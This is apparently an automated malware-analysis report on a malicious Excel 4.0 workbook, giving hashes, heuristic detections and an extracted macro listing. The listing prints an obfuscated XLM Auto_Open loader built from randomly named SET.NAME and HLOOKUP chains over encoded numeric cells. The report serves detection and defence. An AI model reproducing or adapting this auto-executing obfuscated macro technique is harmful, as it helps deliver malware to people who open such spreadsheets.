Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c89d1c97521816f1…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-27 11:38:35 Authoring application: Microsoft Excel First seen: 2020-12-25
MD5: 2936cb5063d37c78fbaeb5b71f472310 SHA-1: 08a1c4e41eafffa5f832302f10b25bdcef9159ff SHA-256: c89d1c97521816f1d426818316ba2113197242b00f41c1d8b6e5fa27d55c77e5
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6762 bytes
SHA-256: 7afe5b0e824d479032065a7221e05edda513bfcbedf84e2cc7141ce076cda2ad
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  oejcQa
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!D176 
' 0018     26 LABEL : Cell Value, String Constant - dqaPQwQvVHw len=0 
' 0018     20 LABEL : Cell Value, String Constant - eaFWa len=0 
' 0018     26 LABEL : Cell Value, String Constant - eEmQrjZpvWX len=0 
' 0018     27 LABEL : Cell Value, String Constant - FiykxkMEshDR len=0 
' 0018     24 LABEL : Cell Value, String Constant - gSaqBsiJJ len=0 
' 0018     23 LABEL : Cell Value, String Constant - GSVndReP len=0 
' 0018     24 LABEL : Cell Value, String Constant - GwuCRBgfz len=0 
' 0018     26 LABEL : Cell Value, String Constant - hOHgjNWOKmc len=0 
' 0018     25 LABEL : Cell Value, String Constant - ieeTKNhnaY len=0 
' 0018     26 LABEL : Cell Value, String Constant - IlooygnvuzL len=0 
' 0018     21 LABEL : Cell Value, String Constant - JGwZwx len=0 
' 0018     26 LABEL : Cell Value, String Constant - KlVOxTVwLNU len=0 
' 0018     26 LABEL : Cell Value, String Constant - nrbrgyTWjat len=0 
' 0018     21 LABEL : Cell Value, String Constant - nsmNKH len=0 
' 0018     23 LABEL : Cell Value, String Constant - oPpYKAIW len=0 
' 0018     21 LABEL : Cell Value, String Constant - qQBkVe len=0 
' 0018     20 LABEL : Cell Value, String Constant - RHlod len=0 
' 0018     25 LABEL : Cell Value, String Constant - sPJgygJEKZ len=0 
' 0018     24 LABEL : Cell Value, String Constant - vRsHFSYLF len=0 
' 0018     21 LABEL : Cell Value, String Constant - yDkCUj len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  oejcQa,P59,"",-23.00000000000000000000
'  oejcQa,P60,"",917.00000000000000000000
'  oejcQa,P61,"",638.00000000000000000000
'  oejcQa,P62,"",950.00000000000000000000
'  oejcQa,P63,"",-399.00000000000000000000
'  oejcQa,P64,"",518.00000000000000000000
'  oejcQa,D92,"SET.NAME("nrbrgyTWjat",0+VALUE("0"))",""
'  oejcQa,D97,"SET.NAME("hOHgjNWOKmc",nrbrgyTWjat)",""
'  oejcQa,D100,"SET.NAME("IlooygnvuzL",nrbrgyTWjat)",""
'  oejcQa,D104,"SET.NAME("qQBkVe",COUNTA(eEmQrjZpvWX))",""
'  oejcQa,D106,"SET.NAME("oPpYKAIW",COUNTA(GwuCRBgfz))",""
'  oejcQa,D109,[],""
'  oejcQa,D112,"SET.NAME("gSaqBsiJJ","")",""
'  oejcQa,D114,"hOHgjNWOKmc",""
'  oejcQa,D116,"SET.NAME("eaFWa",HLOOKUP("*",eEmQrjZpvWX,hOHgjNWOKmc,FALSE))",""
'  oejcQa,D119,"FiykxkMEshDR",""
'  oejcQa,D123,"SET.NAME("nsmNKH",nrbrgyTWjat)",""
'  oejcQa,D126,[],""
'  oejcQa,D128,"nsmNKH",""
'  oejcQa,D130,"sPJgygJEKZ",""
'  oejcQa,D133,"ieeTKNhnaY",""
'  oejcQa,D137,"vRsHFSYLF",""
'  oejcQa,D142,"SET.NAME("yDkCUj",VALUE(HLOOKUP("*",GwuCRBgfz,vRsHFSYLF,FALSE)))",""
'  oejcQa,D146,"JGwZwx",""
'  oejcQa,D148,"gSaqBsiJJ",""
'  oejcQa,D153,"IlooygnvuzL",""
'  oejcQa,D157,NEXT(),""
'  oejcQa,D160,"KlVOxTVwLNU",""
'  oejcQa,D164,[],""
'  oejcQa,D166,"dqaPQwQvVHw",""
'  oejcQa,D168,NEXT(),""
'  oejcQa,D172,RETURN(),""
'  oejcQa,D198,"SET.NAME("RHlod",D92)",""
'  oejcQa,D203,"eEmQrjZpvWX",""
'  oejcQa,D205,"SET.NAME("GwuCRBgfz",R58C12)",""
'  oejcQa,D207,"SET.NAME("dqaPQwQvVHw",214)",""
'  oejcQa,D210,"SET.NAME("GSVndReP",4)",""
'  oejcQa,D213,RHlod(),""
'  oejcQa,D214,HALT(),""